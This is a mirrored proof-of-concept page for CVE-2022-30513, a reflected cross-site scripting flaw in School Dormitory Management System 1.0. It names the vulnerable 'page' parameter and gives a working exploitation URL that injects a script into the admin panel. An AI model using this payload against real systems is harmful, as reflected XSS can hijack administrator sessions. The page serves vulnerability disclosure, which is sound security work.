CVE-2022-30513 PoC — School Dormitory Management System 跨站脚本漏洞

Source

https://github.com/bigzooooz/CVE-2022-30513

Associated Vulnerability

Title:School Dormitory Management System 跨站脚本漏洞 (CVE-2022-30513)
Description:School Dormitory Management System v1.0 is vulnerable to reflected cross-site scripting (XSS) via admin/inc/navigation.php:125

Description

School Dormitory Management System 1.0 - Reflected XSS

Readme

# CVE-2022-30513

School Dormitory Management System 1.0 - Reflected XSS

#### Exploit Title: School Dormitory Management System 1.0 - Reflected XSS
#### Date: 2022-05-25
#### CVE: CVE-2022-30513
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.sourcecodester.com/
#### Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html
#### Version: 1.0
#### Tested on: LAMP, Ubuntu

-----


#### [#] Vulnerability Location:

  `$_GET['page']` in `/dms/admin/inc/navigation.php:125`

----

#### [#] Exploitation :

  `http://localhost/dms/admin/?page=%27;%20alert(%22b4zb0z%22);%20s=%27`

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!